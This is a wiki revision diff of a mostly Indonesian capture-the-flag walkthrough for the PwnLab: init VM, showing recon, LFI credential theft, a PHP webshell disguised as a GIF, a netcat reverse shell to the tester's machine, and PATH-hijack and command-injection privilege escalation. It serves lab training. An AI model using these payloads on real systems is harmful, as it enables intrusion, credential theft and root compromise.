Difference between revisions of "CTF PwnLab: init: Walkthrough"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "Objective / Goal * masuk ke sistem * dapat root Download dari https://www.vulnhub.com/entry/pwnlab-init,158/#download https://download.vulnhub.com/pwnlab/pwnlab_init.ova...")
 
 
(39 intermediate revisions by the same user not shown)
Line 1: Line 1:
Objective / Goal
+
==Objective / Goal==
 +
 
 
* masuk ke sistem
 
* masuk ke sistem
 
* dapat root
 
* dapat root
  
Download dari
+
==Download & Masukan ke VirtualBox==
  
 
  https://www.vulnhub.com/entry/pwnlab-init,158/#download
 
  https://www.vulnhub.com/entry/pwnlab-init,158/#download
 
  https://download.vulnhub.com/pwnlab/pwnlab_init.ova
 
  https://download.vulnhub.com/pwnlab/pwnlab_init.ova
  
Load ke VirtualBox
+
Import pwnlab_init.ova ke VirtualBox
 +
* Load VirtualBox
 +
* Import
 +
 
 +
 
 +
==Kali Linux==
 +
 
 +
===Cek IP address VM===
 +
 
 +
sudo su                           
 +
netdiscover -r 192.168.0.0/24
 +
 
 +
Hasilnya kira-kira
 +
 
 +
Currently scanning: Finished!  |  Screen View: Unique Hosts                                                                                                                     
 +
                                                                                                                                                                                     
 +
  29 Captured ARP Req/Rep packets, from 20 hosts.  Total size: 1740                                                                                                                 
 +
  _____________________________________________________________________________
 +
    IP            At MAC Address    Count    Len  MAC Vendor / Hostname     
 +
  -----------------------------------------------------------------------------
 +
  192.168.0.2    40:16:7e:22:e7:69      1      60  ASUSTek COMPUTER INC.                                                                                                           
 +
  192.168.0.4    10:6f:3f:3d:73:d0      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.7    4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.9    10:6f:3f:17:94:94      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.7    4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.60    74:d0:2b:6a:a9:66      1      60  ASUSTek COMPUTER INC.                                                                                                           
 +
  192.168.0.101  08:60:6e:db:4e:b8      1      60  ASUSTek COMPUTER INC.                                                                                                           
 +
  192.168.0.130  08:00:27:93:a2:1b      1      60  PCS Systemtechnik GmbH                                                                                                           
 +
  192.168.0.141  b0:a7:b9:b6:c1:c9      2    120  TP-Link Corporation Limited                                                                                                     
 +
  192.168.0.145  c0:56:27:1c:be:e1      1      60  Belkin International Inc.                                                                                                       
 +
  192.168.0.169  4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.170  4c:e6:76:1f:15:4b      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.169  4c:e6:76:1f:15:4c      4    240  BUFFALO.INC                                                                                                                     
 +
  192.168.0.170  4c:e6:76:1f:15:4c      1      60  BUFFALO.INC                                                                                                                     
 +
  192.168.0.199  b4:b0:24:3d:8b:3b      1      60  TP-Link Corporation Limited                                                                                                     
 +
  192.168.0.102  6c:29:90:1e:89:7f      1      60  WiZ Connected Lighting Company Limited                                                                                           
 +
  192.168.0.223  c0:56:27:67:0d:a3      1      60  Belkin International Inc.                                                                                                       
 +
  192.168.0.222  6c:16:32:63:52:21      3    180  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                     
 +
  192.168.0.224  28:ff:3e:5c:10:32      4    240  zte corporation                                                                                                                 
 +
  192.168.0.194  52:aa:ba:2c:0b:15      1      60  Unknown vendor 
 +
 
 +
MAC address yang mencurigakan adalah 08:00:.....
 +
IP address target: 192.168.1.130.
 +
 
 +
===Enumeration target===
 +
 
 +
Gunakan nmap -v -A ke IP address sasaran,
 +
 
 +
nmap -v -A 192.168.0.130
 +
 
 +
Hasilnya kira-kira,
 +
 
 +
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-22 03:45 EST
 +
NSE: Loaded 155 scripts for scanning.
 +
NSE: Script Pre-scanning.
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Initiating ARP Ping Scan at 03:45
 +
Scanning 192.168.0.130 [1 port]
 +
Completed ARP Ping Scan at 03:45, 0.07s elapsed (1 total hosts)
 +
Initiating Parallel DNS resolution of 1 host. at 03:45
 +
Completed Parallel DNS resolution of 1 host. at 03:45, 0.00s elapsed
 +
Initiating SYN Stealth Scan at 03:45
 +
Scanning 192.168.0.130 [1000 ports]
 +
Discovered open port 111/tcp on 192.168.0.130
 +
Discovered open port 3306/tcp on 192.168.0.130
 +
Discovered open port 80/tcp on 192.168.0.130
 +
Completed SYN Stealth Scan at 03:45, 0.11s elapsed (1000 total ports)
 +
Initiating Service scan at 03:45
 +
Scanning 3 services on 192.168.0.130
 +
Completed Service scan at 03:45, 6.05s elapsed (3 services on 1 host)
 +
Initiating OS detection (try #1) against 192.168.0.130
 +
NSE: Script scanning 192.168.0.130.
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.19s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.03s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Nmap scan report for 192.168.0.130
 +
Host is up (0.00057s latency).
 +
Not shown: 997 closed tcp ports (reset)
 +
PORT    STATE SERVICE VERSION
 +
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
 +
|_http-title: PwnLab Intranet Image Hosting
 +
| http-methods:
 +
|_  Supported Methods: GET HEAD POST OPTIONS
 +
|_http-server-header: Apache/2.4.10 (Debian)
 +
111/tcp  open  rpcbind 2-4 (RPC #100000)
 +
| rpcinfo:
 +
|  program version    port/proto  service
 +
|  100000  2,3,4        111/tcp  rpcbind
 +
|  100000  2,3,4        111/udp  rpcbind
 +
|  100000  3,4          111/tcp6  rpcbind
 +
|  100000  3,4          111/udp6  rpcbind
 +
|  100024  1          36677/udp6  status
 +
|  100024  1          38362/tcp6  status
 +
|  100024  1          47606/udp  status
 +
|_  100024  1          48220/tcp  status
 +
3306/tcp open  mysql  MySQL 5.5.47-0+deb8u1
 +
| mysql-info:
 +
|  Protocol: 10
 +
|  Version: 5.5.47-0+deb8u1
 +
|  Thread ID: 38
 +
|  Capabilities flags: 63487
 +
|  Some Capabilities: Support41Auth, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld,
 +
SupportsLoadDataLocal, InteractiveClient, IgnoreSigpipes, LongPassword,
 +
ConnectWithDatabase, Speaks41ProtocolNew, DontAllowDatabaseTableColumn,
 +
SupportsTransactions, FoundRows, SupportsCompression, LongColumnFlag, ODBCClient,
 +
SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
 +
|  Status: Autocommit
 +
|  Salt: -G^"+S@(D]'IzNT:dlpn
 +
|_  Auth Plugin Name: mysql_native_password
 +
MAC Address: 08:00:27:93:A2:1B (Oracle VirtualBox virtual NIC)
 +
Device type: general purpose
 +
Running: Linux 3.X|4.X
 +
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 +
OS details: Linux 3.2 - 4.9
 +
Uptime guess: 0.016 days (since Sun Jan 22 03:22:46 2023)
 +
Network Distance: 1 hop
 +
TCP Sequence Prediction: Difficulty=258 (Good luck!)
 +
IP ID Sequence Generation: All zeros
 +
 +
TRACEROUTE
 +
HOP RTT    ADDRESS
 +
1  0.57 ms 192.168.0.130
 +
 +
NSE: Script Post-scanning.
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Initiating NSE at 03:45
 +
Completed NSE at 03:45, 0.00s elapsed
 +
Read data files from: /usr/bin/../share/nmap
 +
OS and Service detection performed. Please report any incorrect results at
 +
https://nmap.org/submit/ .
 +
Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds
 +
            Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
 +
 
 +
Alternatif lain menggunakan onetwopunch.sh script yang bisa di ambil di
 +
 
 +
https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh
 +
 
 +
Caranya,
 +
 
 +
onetwopunch.sh -t targets -p all -n "-sV -O --version-intensity=9" 
 +
 
 +
Dari hasil nmap, terlihat dengan jelas beberapa hal yang menarik dari sasaran,
 +
 
 +
* Ada Web Server
 +
* Ada Database Server
 +
 
 +
==Investigasi HTTP requests/responds==
 +
 
 +
Untuk investigasi HTTP requests/responses
 +
 
 +
Tools: Burp Suite, Fiddler, Tamper Data/Cookies Manager+ (FF addons)
 +
Scan vulnerability (outdated version, LFI/RFI, SQLi, …)
 +
 +
Tools: Nikto, sqlmap, nmap scripts
 +
Mencari hidden/misconfigured directori atau file
 +
 +
Tools: Dirbuster, GoBuster, Nikto
 +
 
 +
atau
 +
 
 +
* https://sectools.org/tag/web-scanners/
 +
 
 +
Jalankan nikto,
 +
 
 +
nikto -host 192.168.0.130
 +
 
 +
Hasilnya,
 +
 
 +
- Nikto v2.1.6
 +
---------------------------------------------------------------------------
 +
+ Target IP:          192.168.0.130
 +
+ Target Hostname:    192.168.0.130
 +
+ Target Port:        80
 +
+ Start Time:        2023-01-22 04:01:12 (GMT-5)
 +
---------------------------------------------------------------------------
 +
+ Server: Apache/2.4.10 (Debian)
 +
+ The anti-clickjacking X-Frame-Options header is not present.
 +
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 +
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 +
+ No CGI Directories found (use '-C all' to force check all possible dirs)
 +
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
 +
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
 +
+ Cookie PHPSESSID created without the httponly flag
 +
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
 +
+ /config.php: PHP Config file may contain database IDs and passwords.
 +
+ OSVDB-3268: /images/: Directory indexing found.
 +
+ OSVDB-3233: /icons/README: Apache default file found.
 +
+ /login.php: Admin login page/section found.
 +
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
 +
+ End Time:          2023-01-22 04:02:08 (GMT-5) (56 seconds)
 +
---------------------------------------------------------------------------
 +
+ 1 host(s) tested
 +
 
 +
Disini yang menarik, kita menemukan,
 +
 
 +
* config.php kemungkinan ada username/password untuk akses database.
 +
* login form, yang perlu di investigasi lebih lanjut, contoh
 +
 
 +
http://192.168.0.130/?page=login. Possibly vulnerable to LFI.
 +
 
 +
kemungkinan vulnerable untuk LFI (Local Inclusion File).
 +
 
 +
==Bruteforcing MySQL==
 +
 
 +
Percobaan untuk bruteforcing MySQL secara manual,
 +
 
 +
mysql -h 192.168.0.130 -u root -p
 +
Enter password: (kosong)
 +
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: NO)
 +
 
 +
mysql -h 192.168.0.130 -u root -p
 +
Enter password: (root)
 +
ERROR 1045 (28000): Access denied for user 'root'@'192.168.0.62' (using password: YES)
 +
 
 +
Naga-naga-nya kita tidak bisa menembus secara manual.                                                                                                                                                                                     
 +
 
 +
 
 +
==Cek Web==
 +
 
 +
===Login Page===
 +
 
 +
Login Page
 +
 
 +
http://192.168.0.130/login.php
 +
 
 +
Coba menggunakan SQL Injection attack,
 +
 
 +
sqlmap -u "http://192.168.0.130/?page=login" --data="user=abcd&pass=abcd&submit=Login" --level=5 --risk=3 --dbms=mysql
 +
 
 +
hasilnya ..
 +
 +
.....
 +
[04:51:46] [WARNING] parameter 'Host' does not seem to be injectable
 +
[04:51:46] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
 +
[04:51:46] [WARNING] your sqlmap version is outdated
 +
 +
[*] ending @ 04:51:46 /2023-01-22/
 +
 
 +
Usaha sql injection gagal, kita coba vulnerable to LFI.
 +
 
 +
===LFI vulnerability===
 +
 
 +
Local File Inclusion (LFI) vulnerability yang sering ditemukan dalam aplikasi web yang ditulis dengan buruk. Kerentanan ini terjadi ketika aplikasi web memungkinkan pengguna mengirimkan input ke dalam file atau mengunggah file ke server. Silahkan baca2 https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
 +
 
 +
Contoh LFI code:
 +
 +
<?php 
 +
    if (isset($_GET['page'])) 
 +
    { 
 +
      include($_GET['page'] . '.php'); 
 +
    } 
 +
?> 
 +
 
 +
Kita coba URL di bawah (gagal total),
 +
 
 +
http://192.168.0.130/?page=/etc/passwd
 +
http://192.168.0.130/?page=/etc/passwd
 +
http://192.168.0.130/?page=../../../../../../../etc/passwd
 +
http://192.168.0.130/?page=../../../../../../../etc/passwd
 +
 
 +
Gunakan PHP filter untuk meng-encode .php file content ke base64 string sehingga kita bisa mem-bypass server agak tidak meng-eksekusi file .php yang kita ambil.
 +
Tampaknya teknik ini berhasil,
 +
 
 +
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=config
 +
 
 +
Kita bisa dapat config.php:
 +
 
 +
<?php
 +
$server  = "localhost";
 +
$username = "root";
 +
$password = "H4u%QJ_H99";
 +
$database = "Users";
 +
?>
 +
 
 +
Keren! kita dapat username password MySQL.
 +
 
 +
Mari kita lanjutkan analisa menggunakan PHP filter,
 +
 
 +
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=index
 +
 
 +
Kita dapat index.php:
 +
 
 +
<?php
 +
//Multilingual. Not implemented yet.
 +
//setcookie("lang","en.lang.php");
 +
if (isset($_COOKIE['lang']))
 +
{
 +
include("lang/".$_COOKIE['lang']);
 +
}
 +
// Not implemented yet.
 +
?>
 +
<html>
 +
 
 +
<head>
 +
<title>PwnLab Intranet Image Hosting</title>
 +
</head>
 +
<body>
 +
<center>
 +
< img src="images/pwnlab.png">< br />
 +
[ < a href="/">Home</a> ][ < a href="?page=login">Login</a> ][ < a href="? page=upload">Upload</a> ]
 +
< hr />< br />
 +
<?php
 +
    if (isset($_GET['page']))
 +
        {
 +
                include($_GET['page'].".php");
 +
        }
 +
        else
 +
        {
 +
                echo "Use this server to upload and share image files inside the intranet";
 +
        }
 +
?>
 +
</center>
 +
</body>
 +
</html>
 +
 
 +
 
 +
Lines 4-6: LFI vulnerability, jika kita set sebuah cookie dengan name _lang _ pointing ke sebuah file di file sistem, maka file tersebut akan di include. Kita bahkan tidak perlu pening menambahkan .php di belakangnya!
 +
Lines 20-23: LFI vulnerability kita dapat source codenya terima kasih banyak.
 +
 
 +
http://192.168.0.130/?page=php://filter/convert.base64-encode/resource=upload
 +
 
 +
Upload.php
 +
 +
<?php
 +
session_start();
 +
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
 +
?>
 +
<html>
 +
        <body>
 +
                <form action='' method='post' enctype='multipart/form-data'>
 +
                        <input type='file' name='file' id='file' />
 +
                        <input type='submit' name='submit' value='Upload'/>
 +
                </form>
 +
        </body>
 +
</html>
 +
<?php
 +
if(isset($_POST['submit'])) {
 +
        if ($_FILES['file']['error'] <= 0) {
 +
                $filename  = $_FILES['file']['name'];
 +
                $filetype  = $_FILES['file']['type'];
 +
                $uploaddir = 'upload/';
 +
                $file_ext  = strrchr($filename, '.');
 +
                $imageinfo = getimagesize($_FILES['file']['tmp_name']);
 +
                $whitelist = array(".jpg",".jpeg",".gif",".png");
 +
 +
                if (!(in_array($file_ext, $whitelist))) {
 +
                        die('Not allowed extension, please upload images only.');
 +
                }
 +
 +
                if(strpos($filetype,'image') === false) {
 +
                        die('Error 001');
 +
                }
 +
 +
                if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
 +
                        die('Error 002');
 +
                }
 +
 +
                if(substr_count($filetype, '/')>1){
 +
                        die('Error 003');
 +
                }
 +
 +
                $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
 +
 +
                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
 +
                        echo "<img src=\"".$uploadfile."\"><br />";
 +
                } else {
 +
                        die('Error 4');
 +
                }
 +
        }
 +
}
 +
?>
 +
 
 +
 
 +
Sampai titik ini kita mengexploit page yang kita lihat di atas. Tapi tampaknya banyak hal yang menarik di page tersebut.
 +
 
 +
Lines 2-3: Ini yang tampaknya men-deny waktu kita akses.
 +
Lines 16-49: Banyak kondisi untuk upload sebuah file:
 +
 
 +
Err 0: Whitelist untuk file dengan ending .jpg, ,jpeg, .gif dan .png
 +
Err 1: File is not identified as an image
 +
Err 2: HEX signature validation?
 +
Err 3: File name contains ‘/’ to avoid LFI
 +
Err 4: Failed to upload file
 +
 
 +
==Akses MySQL==
 +
 
 +
Selanjutnya kita akan melihat kemungkinan untuk upload backdoor.
 +
Kita perlu mengakses page ini.
 +
Mari kita coba akses database MySQL menggunakan username password yang kita temukan di config.php.
 +
 
 +
mysql -h 192.168.0.130 -u root -p 
 +
Enter password: 
 +
 
 +
Welcome to the MariaDB monitor.  Commands end with ; or \g.
 +
Your MySQL connection id is 21180
 +
Server version: 5.5.47-0+deb8u1 (Debian)
 +
 +
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 +
 +
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 +
 +
MySQL [(none)]>
 +
MySQL [(none)]> show databases;
 +
+--------------------+
 +
| Database          |
 +
+--------------------+
 +
| information_schema |
 +
| Users              |
 +
+--------------------+
 +
2 rows in set (0.001 sec)
 +
 
 +
 
 +
MySQL [(none)]>
 +
MySQL [(none)]> use Users;
 +
Reading table information for completion of table and column names
 +
You can turn off this feature to get a quicker startup with -A
 +
 +
Database changed
 +
MySQL [Users]>
 +
 
 +
MySQL [Users]>
 +
MySQL [Users]> show tables;
 +
+-----------------+
 +
| Tables_in_Users |
 +
+-----------------+
 +
| users          |
 +
+-----------------+
 +
1 row in set (0.001 sec)
 +
 +
MySQL [Users]>
 +
 
 +
MySQL [Users]>
 +
MySQL [Users]> select * from users;
 +
+------+------------------+
 +
| user | pass            |
 +
+------+------------------+
 +
| kent | Sld6WHVCSkpOeQ== |
 +
| mike | U0lmZHNURW42SQ== |
 +
| kane | aVN2NVltMkdSbw== |
 +
+------+------------------+
 +
3 rows in set (0.001 sec)
 +
 +
MySQL [Users]>
 +
 
 +
Password tampaknya base64, jika kita decode misalnya via https://www.base64decode.org/, kita akan dapat,
 +
 
 +
kent: JWzXuBJJNy
 +
mike: SIfdsTEn6I
 +
kane: iSv5Ym2GRo
 +
 
 +
==Uploading backdoor==
 +
 
 +
Menggunakan salah satu username password yang tersedia memungkinkan kita untuk mengakses halaman upload. Yang ingin kita lakukan sekarang adalah menemukan cara untuk mendapatkan shell.
 +
 
 +
Bagaimana dengan mengunggah GIF yang berisi kode PHP, dan memasukkannya ke dalam kerentanan LFI yang kami temukan sebelumnya (cookie lang)?
  
  
 +
===Buat fake PNG file berisi PHP code===
  
First lets do an nmap scan of web server.
+
Buat fake png file berisi PHP code,
  
 +
GIF89; 
 +
<?php system($_GET["cmd"]) ?> 
  
  
Ok so the scan revealed multiple things:
+
GIF89 digunakan untuk mem-bypass type check, informasi lebih lanjut bisa di baca2 di https://en.wikipedia.org/wiki/List_of_file_signatures .
  
A web site is being hosted on this machine.
+
Lakukan,
It has a mysql database.
 
rpcbind is open.
 
So lets go and take a look at the site. It seems to be an image hosting server, you need an account to login and host files. Trying some basic SQL injection got me no where, so I whipped out nikto and scanned the server.
 
  
 +
* Login ke pwnlab menggunakan
  
 +
kent: JWzXuBJJNy
 +
mike: SIfdsTEn6I
 +
kane: iSv5Ym2GRo
  
A couple of really interesting things came up with this scan as well:
+
* Upload ke menu upload http://192.168.0.130/?page=upload
  
No XSS protection.
+
File PNG biasanya di simpan dalam md5 hash. Ini bisa dilihat menggunakan CRTL-U dari browser, terlihat md5 hash dari file png yang kita gunakan,
/images directory.
 
/config.php file found, which may contain passwords.
 
The XSS vulnerability can’t help us with this challenge so we’ll forget about it. But the image directory and config.php file are good starting points. After trying to find the specific php version the site was using, I decided to move on to specific exploit types. The page= variable in the URL, gave me the idea that the site may be vulnerable to some sort of injection. This lead me to Local File Inclusion (LFI).
 
  
Thanks to idontplaydarts, the filter command gave me the ability to download some files the system is hosting. So naturally I tried to get the config.php file.
+
../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png
  
(command= php://filter/convert.base64-encode/resource=config)
+
==Set lang cookie agar memasukan image yang kita upload==
  
+
Jika menggunakan chrome, bisa masuk ke Developer Tools (Ctrl-Shift-J atau Tools -> Developer Tools) -> Console dan masukan javascript command:
  
This gave me a base64 encoded version of the config.php file. So now all I have to do is decode it and boom, their’s the password for mysql.
+
document.cookie="keyofcookie=valueofcookie"
  
 +
Kita dapat mengganti / menambahkan new cookie menggunakan teknik ini. Kita juga dapat memasukan multiple cooke seperti,
  
 +
document.cookie="username=John Doe; expires=Thu, 18 Dec 2013 12:00:00 UTC; path=/";
  
So let’s login to mysql and poke around.
+
Dari browser CTRL-SHIFT-J masukan cookies,
  
 +
document.cookie="lang=../upload/d1a17e1e32f2bfa1b90a6754cadd1df8.png";
  
 +
==Start netcat listener di Kali==
  
And there they are, password hashes (or so I thought). After looking around trying to find what type of hash was being used I realized that the passwords weren’t hashed at all, just base64 encoded again (note the == at the end of each password). So decoding them got me the following:
+
Start 4444 listener
  
 +
nc -nvlp 4444
  
 +
Browse untuk connect ke port
  
Now I have three users to login as. Now how will I log in? I could cheat a little and just login from the vm, but that doesn’t sound like fun. So instead I opted to use the pentestmonkey reverse shell. I tried uploading the file straight to the server but that wouldn’t work.
+
* cek IP address kali linux dengan perintah "ifconfig eth0", misalnya hasilnya 192.168.0.62
 +
* Browse ke URL (perhatikan spasi)
  
 +
http://192.168.0.130/?cmd=nc -nv 192.168.0.62 4444 -e /bin/bash
  
 +
Di kali linux CLI akan ada kata2,
  
So instead of guessing what file-types are accepted, I downloaded the upload page using the filter command. After decoding the page and browsing through it, some conditions had to be meet before the file was accepted and uploaded.
+
# nc -nvlp 4444 
 +
listening on [any] 4444 ... 
 +
connect to [192.168.0.62] from (UNKNOWN) [192.168.0.130] 60676
 +
whoami 
 +
www-data 
 +
python -c 'import pty; pty.spawn("/bin/bash");' 
 +
www-data@pwnlab:/var/www/html$
  
 +
==Privilege Escalation==
  
 +
===coba user kent===
  
It had to be a jpg,jpeg,gif or png file.
+
Dari shell, Lakukan su ke user kent
The MIME type had to match.
 
No multiple extensions, so no shell.php.gif
 
Once the file was accepted it would have its name replaced with an md5 version and upload to /upload directory. To get this to work take the reverse shell file, change the extension to .gif instead of .php and add GIF98 to the top of the file. Then upload the file to the server and browse to the /upload directory to see that the file has been uploaded.
 
  
After getting the file to upload, now I have to get it to execute. That is where I ran into a brick wall, I could not get it to execute. After hours of research and trying different things (using burpsuite to get it run as straight php, using null byte etc.) I decided to cheat and look at one of the solutions. It turns out the lang variable set in index.php is vulnerable to LFI. So after setting up netcat first (nc -lvp <port>) we can exploit the LFI. You also need to be logged in for this to work.
+
cd /home
 +
ls
 +
www-data@pwnlab:/home$
  
First install tamperdata ( I used tamperdata, it’s the easiest way, you could use burpsuite or zap as well). Then start tamperdata and refresh the page. It’ll ask you if you want to submit, abort or tamper, click tamper. Then in the cookie section, remove the everything and enter lang=../upload/<filename>, with filename being the name md5 version of uploaded shell name. Presto, now I have a reverse shell.
+
ww-data@pwnlab:/home$ ls -al
 +
ls -al
 +
total 24
 +
drwxr-xr-x  6 root root 4096 Mar 17  2016 .
 +
drwxr-xr-x 21 root root 4096 Mar 17  2016 ..
 +
drwxr-x---  2 john john 4096 Mar 17  2016 john
 +
drwxr-x---  2 kane kane 4096 Mar 17  2016 kane
 +
drwxr-x---  2 kent kent 4096 Mar 17  2016 kent
 +
drwxr-x---  2 mike mike 4096 Mar 17  2016 mike
 +
www-data@pwnlab:/home$
  
Cat the passwd file to see what users are available and there are the same users found in the mysql database. Now load up a shell with python -c “import pty;pty.spawn(‘/bin/sh’);”, su to user kent and enter the password we got before and boom we are in. Since this is a boot2root, lets see who has root privileges.
+
Lalukan su ke user kent
  
 +
www-data@pwnlab:/home$ su kent
 +
su kent
 +
Password: JWzXuBJJNy
 +
 +
kent@pwnlab:/home$ cd kent
 +
cd kent
 +
kent@pwnlab:~$ ls -al
 +
ls -al
 +
total 20
 +
drwxr-x--- 2 kent kent 4096 Mar 17  2016 .
 +
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
 +
-rw-r--r-- 1 kent kent  220 Mar 17  2016 .bash_logout
 +
-rw-r--r-- 1 kent kent 3515 Mar 17  2016 .bashrc
 +
-rw-r--r-- 1 kent kent  675 Mar 17  2016 .profile
 +
kent@pwnlab:~$
  
  
We’ll no surprise really, only one root user, root. After poking around for a while as user kent I found nothing so decided to try the next user down the list mike. However that was a no go.
+
kent@pwnlab:~$ find / -user kent 2>/dev/null 
 +
find / -user kent 2>/dev/null 
 +
.........
 +
/home/kent 
 +
/home/kent/.bashrc 
 +
/home/kent/.profile 
 +
/home/kent/.bash_logout 
  
 +
coba sudo -l
  
 +
kent@pwnlab:~$ sudo -l 
 +
sudo -l 
 +
bash: sudo: command not found 
  
Hmmm that’s a little suss. Lets try user kane.
+
kent tidak bisa sudo :( ..
  
 +
exit
  
  
Okay sweet we’re in as user kane, lets see what he has in his home directory. Whats msgmike? cat the file gives us a bunch of garbage, but looking at the permissions of the file you’ll notice an s variable. What’s that you ask? We’ll after a little research, it turns out to be the directories setgid (set group id) bit is set and executable.
+
===coba user kane===
  
Since it’s executable, I decided to run it.
+
cd /home
 +
www-data@pwnlab:/home$ su kane
 +
su kane
 +
Password: iSv5Ym2GRo
 +
 +
kane@pwnlab:/home$ cd kane
  
 +
kane@pwnlab:~$ ls -al
 +
ls -al
 +
total 28
 +
drwxr-x--- 2 kane kane 4096 Mar 17  2016 .
 +
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
 +
-rw-r--r-- 1 kane kane  220 Mar 17  2016 .bash_logout
 +
-rw-r--r-- 1 kane kane 3515 Mar 17  2016 .bashrc
 +
-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
 +
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile
  
  
Damn an error. But we now know that it needs cat to execute its contents. So cd into the tmp directory and echo “/bin/sh” > cat and chmod 777 cat to give it the right permissions. This again is where I ran into a brick wall and cheated a little. Turns out I needed to set the PATH correctly. So export PATH=.:$PATH fixed that.  Then execute msgmike again and bam we become user mike.
+
kane@pwnlab:~$ file msgmike   
 +
file msgmike
 +
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
 +
kane@pwnlab:~$  
  
 +
kane@pwnlab:~$ strings msgmike 
 +
strings msgmike
 +
/lib/ld-linux.so.2
 +
libc.so.6
 +
_IO_stdin_used
 +
setregid
 +
setreuid
 +
....
 +
....
 +
__TMC_END__
 +
_ITM_registerTMCloneTable
 +
_init
 +
kane@pwnlab:~$
  
 +
Hmmmm kayanya msgmike berusaha coding menggunakan
  
cd to /home/mike and ls the directory we get msg2root. Hmm whats that? Again cating the file will only give you a screen full of garbage so using strings I was able to find out that it asks for some text, echo’s it back to the console and appends it to messages.txt. (strings prints out only the printable strings from a file).
+
int main() 
 +
 +
      system("cat /home/mike/msg.txt")
 +
  
 +
Kalau kita menggunakan cat di directory tertentu & override PATH, kita mungkin bisa dapat shell dari mike!
 +
Contoh shell scripting bisa di baca2 di root-me.org. Lakukan script di bawah ini,
  
 +
kane@pwnlab:~$ echo "/bin/bash" > cat
 +
echo "/bin/bash" > cat
 +
kane@pwnlab:~$ chmod 777 cat
 +
chmod 777 cat
 +
kane@pwnlab:~$ export PATH=/home/kane
 +
export PATH=/home/kane
 +
kane@pwnlab:~$ ./msgmike
 +
./msgmike
 +
bash: dircolors: command not found
 +
bash: ls: command not found
 +
mike@pwnlab:~$
  
Looking at the file permissions, it belongs to root as well.
+
==Jadi mike & jadi root:) ...==
  
 +
Reset PATH variabel terlebih dulu,
  
 +
mike@pwnlab:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 +
</usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin               
 +
mike@pwnlab:~$ cd ../mike
 +
cd ../mike
 +
mike@pwnlab:/home/mike$ ls -al
 +
ls -al
 +
total 28
 +
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
 +
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
 +
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
 +
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
 +
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
 +
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile
 +
mike@pwnlab:/home/mike$ ./msg2root
 +
./msg2root
 +
Message for root: percobaan
 +
percobaan
 +
percobaan
 +
mike@pwnlab:/home/mike$
  
Since the file does not validate the input, using ;/bin/sh returns a shell and since the file executes as root, the shell is also root.
+
ini bagian yang keren:) ..
  
 +
mike@pwnlab:/home/mike$ strings msg2root
 +
strings msg2root
 +
/lib/ld-linux.so.2
 +
libc.so.6
 +
.....
 +
.....
 +
Message for root:
 +
